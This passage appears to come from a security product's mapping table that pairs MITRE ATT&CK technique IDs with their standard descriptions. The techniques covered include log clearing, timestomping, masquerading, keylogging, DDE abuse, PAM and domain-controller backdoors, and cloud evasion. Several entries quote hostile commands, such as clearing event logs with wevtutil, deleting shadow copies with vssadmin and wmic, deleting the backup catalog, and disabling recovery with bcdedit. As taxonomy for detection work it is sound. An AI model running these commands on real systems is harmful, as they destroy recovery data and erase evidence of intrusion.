Application, and Security, with five event types: Error, Warning, Information, Success Audit, and Failure
Audit. The event logs can be cleared with the following utility commands: * wevtutil cl system *
wevtutil cl application * wevtutil cl security These logs may also be cleared through other
mechanisms, such as the event viewer GUI or [PowerShell](https://attack.mitre.org/techniques/T1059/001).
https://attack.mitre.org/techniques/T1070/001

T1070.004 XDM_CONST.MITRE_TECHNIQUE_INDICATOR_REMOVAL_ON_HOST_FILE_DELETION Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other
non-native files dropped or created on a system by an adversary may leave traces to indicate to what was
done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-
intrusion process to minimize the adversary's footprint. There are tools available from the host operating
system to perform cleanup, but adversaries may use other tools as well. Examples include native [cmd]
(https://attack.mitre.org/software/S0106) functions such as DEL, secure deletion tools such as Windows
Sysinternals SDelete, or other third-party file deletion tools. (Citation: Trend Micro APT Attack Tools) https://
attack.mitre.org/techniques/T1070/004

T1070.005 XDM_CONST.MITRE_TECHNIQUE_INDICATOR_REMOVAL_ON_HOST_NETWORK_SHARE_CONNECTION_REMOVAL Adversaries may remove share connections that are no longer useful in order to clean up traces of their
operation. Windows shared drive and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/
T1021/002) connections can be removed when no longer needed. [Net](https://attack.mitre.org/software/
S0039) is an example utility that can be used to remove network share connections with the net use \
\system\share /delete command. (Citation: Technet Net Use) https://attack.mitre.org/techniques/
T1070/005

T1070.006 XDM_CONST.MITRE_TECHNIQUE_INDICATOR_REMOVAL_ON_HOST_TIMESTOMP Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a
technique that modifies the timestamps of a file (the modify, access, create, and change times), often to
mimic files that are in the same folder. This is done, for example, on files that have been modified or
created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis
tools. Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/
T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques) https://attack.mitre.org/
techniques/T1070/006

T1202 XDM_CONST.MITRE_TECHNIQUE_INDIRECT_COMMAND_EXECUTION Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit
the use of command-line interpreters. Various Windows utilities may be used to execute commands,
possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://
attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the
Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and
commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run
window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)
Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005),
specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as
Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file
extensions more commonly associated with malicious payloads. https://attack.mitre.org/techniques/T1202

T1105 XDM_CONST.MITRE_TECHNIQUE_INGRESS_TOOL_TRANSFER Adversaries may transfer tools or other files from an external system into a compromised environment.
Files may be copied from an external adversary controlled system through the command and control
channel to bring tools into the victim network or through alternate protocols with another tool such as FTP.
Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp. https://
attack.mitre.org/techniques/T1105

T1490 XDM_CONST.MITRE_TECHNIQUE_INHIBIT_SYSTEM_RECOVERY Adversaries may delete or remove built-in operating system data and turn off services designed to aid in
the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation:
FireEye WannaCry 2017) Operating systems may contain features that can help fix corrupted systems,
such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable
or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/
techniques/T1485) and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation:
Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) A number of native Windows utilities
have been used by adversaries to disable or delete system recovery features: * vssadmin.exe can be
used to delete all volume shadow copies on a system - vssadmin.exe delete shadows /all /quiet *
[Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete
volume shadow copies - wmic shadowcopy delete * wbadmin.exe can be used to delete the Windows
Backup Catalog - wbadmin.exe delete catalog -quiet * bcdedit.exe can be used to disable
automatic Windows recovery features by modifying boot configuration data - bcdedit.exe /set
{default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled
no https://attack.mitre.org/techniques/T1490

T1056 XDM_CONST.MITRE_TECHNIQUE_INPUT_CAPTURE Adversaries may use methods of capturing user input to obtain credentials or collect information. During
normal system usage, users often provide credentials to various different locations, such as login pages/
portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. [Credential
API Hooking](https://attack.mitre.org/techniques/T1056/004)) or rely on deceiving the user into providing
input into what they believe to be a genuine service (e.g. [Web Portal Capture](https://attack.mitre.org/
techniques/T1056/003)). https://attack.mitre.org/techniques/T1056

T1056.004 XDM_CONST.MITRE_TECHNIQUE_INPUT_CAPTURE_CREDENTIAL_API_HOOKING Adversaries may hook into Windows application programming interface (API) functions to collect user
credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user
authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging]
(https://attack.mitre.org/techniques/T1056/001), this technique focuses specifically on API functions that
include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and
can be implemented via: * **Hooks procedures**, which intercept and execute designated code in response
to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation:
Elastic Process Injection July 2017) * **Import address table (IAT) hooking**, which use modifications to a
process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July
2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015) *
**Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic
Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation:
MWRInfoSecurity Dynamic Hooking 2015) https://attack.mitre.org/techniques/T1056/004

T1056.002 XDM_CONST.MITRE_TECHNIQUE_INPUT_CAPTURE_GUI_INPUT_CAPTURE Adversaries may mimic common operating system GUI components to prompt users for credentials with a
seemingly legitimate prompt. When programs are executed that need additional privileges than are present
in the current user context, it is common for the operating system to prompt the user for proper credentials
to authorize the elevated privileges for the task (ex: [Bypass User Account Control](https://attack.mitre.org/
techniques/T1548/002)). Adversaries may mimic this functionality to prompt users for credentials with a
seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a fake installer
requiring additional access or a fake malware removal suite.(Citation: OSX Malware Exploits MacKeeper)
This type of prompt can be used to collect credentials via various languages such as [AppleScript](https://
attack.mitre.org/techniques/T1059/002)(Citation: LogRhythm Do You Trust Oct 2014)(Citation: OSX
Keydnap malware)(Citation: Spoofing credential dialogs) and [PowerShell](https://attack.mitre.org/
techniques/T1059/001).(Citation: LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for
Credentials Jan 2015)(Citation: Spoofing credential dialogs) On Linux systems attackers may launch dialog
boxes prompting users for credentials from malicious shell scripts or the command line (i.e. [Unix Shell]
(https://attack.mitre.org/techniques/T1059/004)).(Citation: Spoofing credential dialogs) https://
attack.mitre.org/techniques/T1056/002
Original Mapped Description

T1056.001 XDM_CONST.MITRE_TECHNIQUE_INPUT_CAPTURE_KEYLOGGING Adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to
be used to acquire credentials for new access opportunities when [OS Credential Dumping](https://
attack.mitre.org/techniques/T1003) efforts are not effective, and may require an adversary to intercept
keystrokes on a system for a substantial period of time before credentials can be successfully captured.
Keylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes.
(Citation: Adventures of a Keystroke) Some methods include: * Hooking API callbacks used for processing
keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), this focuses
solely on API functions intended for processing keystroke data. * Reading raw keystroke data from the
hardware buffer. * Windows Registry modifications. * Custom drivers. * [Modify System Image](https://
attack.mitre.org/techniques/T1601) may provide adversaries with hooks into the operating system of
network devices to read raw keystrokes for login sessions.(Citation: Cisco Blog Legacy Device Attacks)
https://attack.mitre.org/techniques/T1056/001

T1056.003 XDM_CONST.MITRE_TECHNIQUE_INPUT_CAPTURE_WEB_PORTAL_CAPTURE Adversaries may install code on externally facing portals, such as a VPN login page, to capture and
transmit credentials of users who attempt to log into the service. For example, a compromised login page
may log provided user credentials before logging the user in to the service. This variation on input capture
may be conducted post-compromise using legitimate administrative access as a backup measure to
maintain network access through [External Remote Services](https://attack.mitre.org/techniques/T1133)
and [Valid Accounts](https://attack.mitre.org/techniques/T1078) or as part of the initial compromise by
exploitation of the externally facing web service.(Citation: Volexity Virtual Private Keylogging) https://
attack.mitre.org/techniques/T1056/003

T1559 XDM_CONST.MITRE_TECHNIQUE_INTER_PROCESS_COMMUNICATION Adversaries may abuse inter-process communication (IPC) mechanisms for local code or command
execution. IPC is typically used by processes to share data, communicate with each other, or synchronize
execution. IPC is also commonly used to avoid situations such as deadlocks, which occurs when processes
are stuck in a cyclic waiting pattern. Adversaries may abuse IPC to execute arbitrary code or commands.
IPC mechanisms may differ depending on OS, but typically exists in a form accessible through
programming languages/libraries or native interfaces such as Windows [Dynamic Data Exchange](https://
attack.mitre.org/techniques/T1559/002) or [Component Object Model](https://attack.mitre.org/techniques/
T1559/001). Higher level execution mediums, such as those of [Command and Scripting Interpreter](https://
attack.mitre.org/techniques/T1059)s, may also leverage underlying IPC mechanisms. Adversaries may also
use [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object
Model](https://attack.mitre.org/techniques/T1021/003) to facilitate remote IPC execution.(Citation: Fireeye
Hunting COM June 2019) https://attack.mitre.org/techniques/T1559

T1559.001 XDM_CONST.MITRE_TECHNIQUE_INTER_PROCESS_COMMUNICATION_COMPONENT_OBJECT_MODEL Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an
inter-process communication (IPC) component of the native Windows application programming interface
(API) that enables interaction between software objects, or executable code that implements one or more
interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of
server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE).(Citation:
Microsoft COM) Remote COM execution is facilitated by [Remote Services](https://attack.mitre.org/
techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/
T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019) Various COM interfaces are exposed that
can be abused to invoke arbitrary execution via a variety of programming languages such as C, C++, Java,
and [Visual Basic](https://attack.mitre.org/techniques/T1059/005).(Citation: Microsoft COM) Specific COM
objects also exist to directly perform functions beyond code execution, such as creating a [Scheduled Task/
Job](https://attack.mitre.org/techniques/T1053), fileless download/execution, and other adversary behaviors
related to privilege escalation and persistence.(Citation: Fireeye Hunting COM June 2019)(Citation:
ProjectZero File Write EoP Apr 2018) https://attack.mitre.org/techniques/T1559/001

T1559.002 XDM_CONST.MITRE_TECHNIQUE_INTER_PROCESS_COMMUNICATION_DYNAMIC_DATA_EXCHANGE Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a
client-server protocol for one-time and/or continuous inter-process communication (IPC) between
applications. Once a link is established, applications can autonomously exchange transactions consisting of
strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to
a data item), and requests for command execution. Object Linking and Embedding (OLE), or the ability to
link data between documents, was originally implemented through DDE. Despite being superseded by
[Component Object Model](https://attack.mitre.org/techniques/T1559/001), DDE may be enabled in
Windows 10 and most of Microsoft Office 2016 via Registry keys. (Citation: BleepingComputer DDE
Disabled in Word Dec 2017) (Citation: Microsoft ADV170021 Dec 2017) (Citation: Microsoft DDE Advisory
Nov 2017) Microsoft Office documents can be poisoned with DDE commands (Citation: SensePost PS
DDE May 2016) (Citation: Kettle CSV DDE Aug 2014), directly or through embedded files (Citation: Enigma
Reviving DDE Jan 2018), and used to deliver execution via [Phishing](https://attack.mitre.org/techniques/
T1566) campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros.
(Citation: SensePost MacroLess DDE Oct 2017) DDE could also be leveraged by an adversary operating
on a compromised machine who does not have direct access to a [Command and Scripting Interpreter]
(https://attack.mitre.org/techniques/T1059). DDE execution can be invoked remotely via [Remote Services]
(https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://
attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019) https://
attack.mitre.org/techniques/T1559/002

T1534 XDM_CONST.MITRE_TECHNIQUE_INTERNAL_SPEARPHISHING Adversaries may use internal spearphishing to gain access to additional information or exploit other users
within the same organization after they already have access to accounts or systems within the environment.
Internal spearphishing is multi-staged attack where an email account is owned either by controlling the
user's device with previously installed malware or by compromising the account credentials of the user.
Adversaries attempt to take advantage of a trusted internal account to increase the likelihood of tricking the
target into falling for the phish attempt.(Citation: Trend Micro When Phishing Starts from the Inside 2017)
Adversaries may leverage [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) or
[Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) as part of internal spearphishing to
deliver a payload or redirect to an external site to capture credentials through [Input Capture](https://
attack.mitre.org/techniques/T1056) on sites that mimic email login interfaces. There have been notable
incidents where internal spearphishing has been used. The Eye Pyramid campaign used phishing emails
with malicious attachments for lateral movement between victims, compromising nearly 18,000 email
accounts in the process.(Citation: Trend Micro When Phishing Starts from the Inside 2017) The Syrian
Electronic Army (SEA) compromised email accounts at the Financial Times (FT) to steal additional account
credentials. Once FT learned of the attack and began warning employees of the threat, the SEA sent
phishing emails mimicking the Financial Times IT department and were able to compromise even more
users.(Citation: THE FINANCIAL TIMES LTD 2019.) https://attack.mitre.org/techniques/T1534

T1570 XDM_CONST.MITRE_TECHNIQUE_LATERAL_TOOL_TRANSFER Adversaries may transfer tools or other files between systems in a compromised environment. Files may be
copied from one system to another to stage adversary tools or other files over the course of an operation.
Adversaries may copy files laterally between internal victim systems to support lateral movement using
inherent file sharing protocols such as file sharing over SMB to connected network shares or with
authenticated connections with [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/
T1021/002) or [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001). Files can also be
copied over on Mac and Linux with native tools like scp, rsync, and sftp. https://attack.mitre.org/techniques/
T1570

T1036 XDM_CONST.MITRE_TECHNIQUE_MASQUERADING Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign
to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or
malicious, is manipulated or abused for the sake of evading defenses and observation. This may include
manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or
service names. Renaming abusable system utilities to evade security monitoring is also a form of
[Masquerading](https://attack.mitre.org/techniques/T1036).(Citation: LOLBAS Main Site) https://
attack.mitre.org/techniques/T1036
Original Mapped Description

T1036.007 XDM_CONST.MITRE_TECHNIQUE_MASQUERADING_DOUBLE_FILE_EXTENSION Adversaries may abuse a double extension in the filename as a means of masquerading the true file type.
A file name may include a secondary file type extension that may cause only the first extension to be
displayed (ex: File.txt.exe may render in some views as just File.txt). However, the second extension
is the true file type that determines how the file is opened and executed. The real file extension may be
hidden by the operating system in the file browser (ex: explorer.exe), as well as in any software configured
using or similar to the system’s policies.(Citation: PCMag DoubleExtension)(Citation: SOCPrime
DoubleExtension) Adversaries may abuse double extensions to attempt to conceal dangerous file types of
payloads. A very common usage involves tricking a user into opening what they think is a benign file type
but is actually executable code. Such files often pose as email attachments and allow an adversary to gain
[Initial Access](https://attack.mitre.org/tactics/TA0001) into a user’s system via [Spearphishing Attachment]
(https://attack.mitre.org/techniques/T1566/001) then [User Execution](https://attack.mitre.org/techniques/
T1204). For example, an executable file attachment named Evil.txt.exe may display as Evil.txt to a
user. The user may then view it as a benign text file and open it, inadvertently executing the hidden
malware.(Citation: SOCPrime DoubleExtension) Common file types, such as text files (.txt, .doc, etc.) and
image files (.jpg, .gif, etc.) are typically used as the first extension to appear benign. Executable extensions
commonly regarded as dangerous, such as .exe, .lnk, .hta, and .scr, often appear as the second extension
and true file type. https://attack.mitre.org/techniques/T1036/007

T1036.001 XDM_CONST.MITRE_TECHNIQUE_MASQUERADING_INVALID_CODE_SIGNATURE Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a
user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a
guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature
information from a signed program, then use it as a template for an unsigned program. Files with invalid
code signatures will fail digital signature validation checks, but they may appear more legitimate to users
and security tools may improperly handle these files.(Citation: Threatexpress MetaTwin 2017) Unlike [Code
Signing](https://attack.mitre.org/techniques/T1553/002), this activity will not result in a valid signature.
https://attack.mitre.org/techniques/T1036/001

T1036.004 XDM_CONST.MITRE_TECHNIQUE_MASQUERADING_MASQUERADE_TASK_OR_SERVICE Adversaries may attempt to manipulate the name of a task or service to make it appear legitimate or
benign. Tasks/services executed by the Task Scheduler or systemd will typically be given a name and/or
description.(Citation: TechNet Schtasks)(Citation: Systemd Service Units) Windows services will have a
service name as well as a display name. Many benign tasks and services exist that have commonly
associated names. Adversaries may give tasks or services names that are similar or identical to those of
legitimate ones. Tasks or services contain other fields, such as a description, that adversaries may attempt
to make appear legitimate.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Fysbis Dr Web Analysis)
https://attack.mitre.org/techniques/T1036/004

T1036.005 XDM_CONST.MITRE_TECHNIQUE_MASQUERADING_MATCH_LEGITIMATE_NAME_OR_LOCATION Adversaries may match or approximate the name or location of legitimate files or resources when naming/
placing them. This is done for the sake of evading defenses and observation. This may be done by placing
an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate,
trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a
resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a
file or container image name given may be a close approximation to legitimate programs/images or
something innocuous. Adversaries may also use the same icon of the file they are trying to mimic. https://
attack.mitre.org/techniques/T1036/005

T1036.003 XDM_CONST.MITRE_TECHNIQUE_MASQUERADING_RENAME_SYSTEM_UTILITIES Adversaries may rename legitimate system utilities to try to evade security mechanisms concerning the
usage of those utilities. Security monitoring and control mechanisms may be in place for system utilities
adversaries are capable of abusing. (Citation: LOLBAS Main Site) It may be possible to bypass those
security mechanisms by renaming the utility prior to utilization (ex: rename rundll32.exe). (Citation:
Elastic Masquerade Ball) An alternative case occurs when a legitimate utility is copied or moved to a
different directory and renamed to avoid detections based on system utilities executing from non-standard
paths. (Citation: F-Secure CozyDuke) https://attack.mitre.org/techniques/T1036/003

T1036.002 XDM_CONST.MITRE_TECHNIQUE_MASQUERADING_RIGHT_TO_LEFT_OVERRIDE Adversaries may abuse the right-to-left override (RTLO or RLO) character (U+202E) to disguise a string
and/or file name to make it appear benign. RTLO is a non-printing Unicode character that causes the text
that follows it to be displayed in reverse. For example, a Windows screensaver executable named March
25 \u202Excod.scr will display as March 25 rcs.docx. A JavaScript file named
photo_high_re\u202Egnp.js will be displayed as photo_high_resj.png.(Citation: Infosecinstitute RTLO
Technique) Adversaries may abuse the RTLO character as a means of tricking a user into executing what
they think is a benign file type. A common use of this technique is with [Spearphishing Attachment](https://
attack.mitre.org/techniques/T1566/001)/[Malicious File](https://attack.mitre.org/techniques/T1204/002)
since it can trick both end users and defenders if they are not aware of how their tools display and render
the RTLO character. Use of the RTLO character has been seen in many targeted intrusion attempts and
criminal activity.(Citation: Trend Micro PLEAD RTLO)(Citation: Kaspersky RTLO Cyber Crime) RTLO can
be used in the Windows Registry as well, where regedit.exe displays the reversed characters but the
command line tool reg.exe does not by default. https://attack.mitre.org/techniques/T1036/002

T1036.006 XDM_CONST.MITRE_TECHNIQUE_MASQUERADING_SPACE_AFTER_FILENAME Adversaries can hide a program's true filetype by changing the extension of a file. With certain file types
(specifically this does not work with .app extensions), appending a space to the end of a filename will
change how the file is processed by the operating system. For example, if there is a Mach-O executable file
called evil.bin, when it is double clicked by a user, it will launch Terminal.app and execute. If this file is
renamed to evil.txt, then when double clicked by a user, it will launch with the default text editing
application (not executing the binary). However, if the file is renamed to evil.txt (note the space at the
end), then when double clicked by a user, the true file type is determined by the OS and handled
appropriately and the binary will be executed (Citation: Mac Backdoors are back). Adversaries can use this
feature to trick users into double clicking benign-looking files of any format and ultimately executing
something malicious. https://attack.mitre.org/techniques/T1036/006

T1556 XDM_CONST.MITRE_TECHNIQUE_MODIFY_AUTHENTICATION_PROCESS Adversaries may modify authentication mechanisms and processes to access user credentials or enable
otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as
the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on
Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on
MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an
authentication process, an adversary may be able to authenticate to a service or system without using
[Valid Accounts](https://attack.mitre.org/techniques/T1078). Adversaries may maliciously modify a part of
this process to either reveal credentials or bypass authentication mechanisms. Compromised credentials or
access may be used to bypass access controls placed on various resources on systems within the network
and may even be used for persistent access to remote systems and externally available services, such as
VPNs, Outlook Web Access and remote desktop. https://attack.mitre.org/techniques/T1556

T1556.001 XDM_CONST.MITRE_TECHNIQUE_MODIFY_AUTHENTICATION_PROCESS_DOMAIN_CONTROLLER_AUTHENTICATION Adversaries may patch the authentication process on a domain controller to bypass the typical
authentication mechanisms and enable access to accounts. Malware may be used to inject false
credentials into the authentication process on a domain controller with the intent of creating a backdoor
used to access any user’s account and/or credentials (ex: [Skeleton Key](https://attack.mitre.org/software/
S0007)). Skeleton key works through a patch on an enterprise domain controller authentication process
(LSASS) with credentials that adversaries may use to bypass the standard authentication system. Once
patched, an adversary can use the injected password to successfully authenticate as any domain user
account (until the the skeleton key is erased from memory by a reboot of the domain controller).
Authenticated access may enable unfettered access to hosts and/or resources within single-factor
authentication environments.(Citation: Dell Skeleton) https://attack.mitre.org/techniques/T1556/001

T1556.004 XDM_CONST.MITRE_TECHNIQUE_MODIFY_AUTHENTICATION_PROCESS_NETWORK_DEVICE_AUTHENTICATION Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a
password in the operating system, thus bypassing of native authentication mechanisms for local accounts
on network devices. [Modify System Image](https://attack.mitre.org/techniques/T1601) may include
implanted code to the operating system for network devices to provide access for adversaries using a
specific password. The modification includes a specific password which is implanted in the operating
system image via the patch. Upon authentication attempts, the inserted code will first check to see if the
user input is the password. If so, access is granted. Otherwise, the implanted code will pass the credentials
on for verification of potentially valid credentials.(Citation: FireEye - Synful Knock) https://attack.mitre.org/
techniques/T1556/004
Original Mapped Description

T1556.002 XDM_CONST.MITRE_TECHNIQUE_MODIFY_AUTHENTICATION_PROCESS_PASSWORD_FILTER_DLL Adversaries may register malicious password filter dynamic link libraries (DLLs) into the authentication
process to acquire user credentials as they are validated. Windows password filters are password policy
enforcement mechanisms for both domain and local accounts. Filters are implemented as DLLs containing
a method to validate potential passwords against password policies. Filter DLLs can be positioned on local
computers for local accounts and/or domain controllers for domain accounts. Before registering new
passwords in the Security Accounts Manager (SAM), the Local Security Authority (LSA) requests validation
from each registered filter. Any potential changes cannot take effect until every registered filter
acknowledges validation. Adversaries can register malicious password filters to harvest credentials from
local computers and/or entire domains. To perform proper validation, filters must receive plain-text
credentials from the LSA. A malicious password filter would receive these plain-text credentials every time
a password request is made.(Citation: Carnal Ownage Password Filters Sept 2013) https://attack.mitre.org/
techniques/T1556/002

T1556.003 XDM_CONST.MITRE_TECHNIQUE_MODIFY_AUTHENTICATION_PROCESS_PLUGGABLE_AUTHENTICATION_MODULES Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable
otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and
executable files which guide authentication for many services. The most common authentication module is
pam_unix.so, which retrieves, sets, and verifies account authentication information in /etc/passwd and /
etc/shadow.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM) Adversaries may
modify components of the PAM system to create backdoors. PAM components, such as pam_unix.so, can
be patched to accept arbitrary adversary supplied values as legitimate credentials.(Citation: PAM Backdoor)
Malicious modifications to the PAM system may also be abused to steal credentials. Adversaries may infect
PAM resources with code to harvest user credentials, since the values exchanged with PAM components
may be plain-text since PAM does not store passwords.(Citation: PAM Creds)(Citation: Apple PAM) https://
attack.mitre.org/techniques/T1556/003

T1578 XDM_CONST.MITRE_TECHNIQUE_MODIFY_CLOUD_COMPUTE_INFRASTRUCTURE An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses. A
modification to the compute service infrastructure can include the creation, deletion, or modification of one
or more components such as compute instances, virtual machines, and snapshots. Permissions gained
from the modification of infrastructure components may bypass restrictions that prevent access to existing
infrastructure. Modifying infrastructure components may also allow an adversary to evade detection and
remove evidence of their presence.(Citation: Mandiant M-Trends 2020) https://attack.mitre.org/techniques/
T1578

T1578.002 XDM_CONST.MITRE_TECHNIQUE_MODIFY_CLOUD_COMPUTE_INFRASTRUCTURE_CREATE_CLOUD_INSTANCE An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud
account to evade defenses. Creating a new instance may allow an adversary to bypass firewall rules and
permissions that exist on instances currently residing within an account. An adversary may [Create
Snapshot](https://attack.mitre.org/techniques/T1578/001) of one or more volumes in an account, create a
new instance, mount the snapshots, and then apply a less restrictive security policy to collect [Data from
Local System](https://attack.mitre.org/techniques/T1005) or for [Remote Data Staging](https://
attack.mitre.org/techniques/T1074/002).(Citation: Mandiant M-Trends 2020) Creating a new instance may
also allow an adversary to carry out malicious activity within an environment without affecting the execution
of current running instances. https://attack.mitre.org/techniques/T1578/002

T1578.001 XDM_CONST.MITRE_TECHNIQUE_MODIFY_CLOUD_COMPUTE_INFRASTRUCTURE_CREATE_SNAPSHOT An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot
is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard
drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass
restrictions that prevent access to existing compute service infrastructure, unlike in [Revert Cloud Instance]
(https://attack.mitre.org/techniques/T1578/004) where an adversary may revert to a snapshot to evade
detection and remove evidence of their presence. An adversary may [Create Cloud Instance](https://
attack.mitre.org/techniques/T1578/002), mount one or more created snapshots to that instance, and then
apply a policy that allows the adversary access to the created instance, such as a firewall policy that allows
them inbound and outbound SSH access.(Citation: Mandiant M-Trends 2020) https://attack.mitre.org/
techniques/T1578/001

T1578.003 XDM_CONST.MITRE_TECHNIQUE_MODIFY_CLOUD_COMPUTE_INFRASTRUCTURE_DELETE_CLOUD_INSTANCE An adversary may delete a cloud instance after they have performed malicious activities in an attempt to
evade detection and remove evidence of their presence. Deleting an instance or virtual machine can
remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not
recoverable. An adversary may also [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002)
and later terminate the instance after achieving their objectives.(Citation: Mandiant M-Trends 2020) https://
attack.mitre.org/techniques/T1578/003

